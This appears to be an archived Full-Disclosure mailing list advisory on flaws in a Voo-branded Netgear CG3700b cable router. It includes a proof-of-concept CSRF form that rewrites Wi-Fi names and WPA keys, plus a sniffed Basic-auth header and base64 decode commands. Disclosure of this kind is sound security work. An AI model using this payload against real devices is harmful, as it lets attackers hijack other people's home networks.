lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 26 Apr 2016 07:10:35 -0400
Subject: [FD] Multiple Vulnerabilities in Voo branded Netgear CG3700b

CVEs pending, screenshots and further examples available soon on my site.

Cross-Site Request Forgery (CSRF) on all form POSTs
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03)
allows a (context-dependent) attacker to perform a Cross-Site Request
Forgery (CSRF) attack on all configuration setting
(/goform/<settingspage>) page POST requests. By tricking a user into
following a specially crafted link, an attacker can modify all settings
including WEP/WPA/WPA2 keys, restore the router to factory settings, or
even upload an entire malicious configuration file.

<form method="POST" name="form0" action=""
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value=0>
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value=20>
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value=0>
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value=20>
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value=1>
<input type="hidden" name="only_mode" value=0>
<input type="hidden" name="selected_ch_an" value=1>

Insufficient Authentication (OWASP-A2)
This same modem handles authentication via basic authentication over the
default (HTTP, non-ssl) connection. This allows an attacker to easily
decode the base64 encoded username and password, and authenticate to the
router. This only requires an attacker be on the same network as the
router, and sniff the clear-text traffic.

Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

root@...i:~# cat voo.txt
root@...i:~# base64 --decode voo.txt

Disclosure Timeline
22 Jan - discovered vulnerability, initially notified vendor
23 Jan - requested CVE
7 Mar - contacted vendor again, was notified that this will not be fixed
at this time
20 April - attempted to contact Mitre again to receive CVE
21 April - sent to Full Disclosure
23 April - additional information (tentatively) posted to
26 April - resending to Full Disclosure due to some errors

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists